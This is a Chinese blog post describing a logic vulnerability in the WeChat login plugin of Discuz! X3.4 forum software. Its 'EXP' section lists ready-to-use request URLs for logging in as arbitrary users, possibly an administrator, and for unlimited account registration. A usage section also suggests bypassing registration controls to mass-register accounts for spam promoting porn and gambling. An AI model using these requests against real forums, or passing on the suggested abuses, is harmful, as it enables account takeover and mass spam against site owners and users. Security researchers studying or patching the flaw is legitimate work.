⭐discuz 3.4 微信登陆逻辑漏洞

原创 sauren  2018-12-24 15:06  阅读 1,192 views 次 评论 0 条

Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史。日前最高版本X3.4 正式版被爆出存在多个逻辑漏洞。

详情链接:https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI

一、影响版本

X3.4  安装并开启了微信登陆插件

 

二、EXP

随机登陆一个账号

/plugin.php?id=wechat:wechat&ac=wxregister&username={username}

清空tmp

/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={csrf_hash}

注册账号

/plugin.php?id=wechat:wechat&ac=wxregister&username={username}&wxopenid=abcdefg

注意:登陆后会跳转到微信,然后回到首页刷新即可。

三、利用

1.任意登陆 如果管理员第一个,那就直接进管理员了,一般都是经验高的用户。如果tmp内没有用户,则可能会给与一个实际没有任何注册的用户。

2.无限注册 某些论坛可能开了注册码注册之类的,这个漏洞可以绕过注册限制,批量注册,从而可以做HC,黄赌毒外推。。。。

本文地址:https://www.sk15.net/archives/119.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情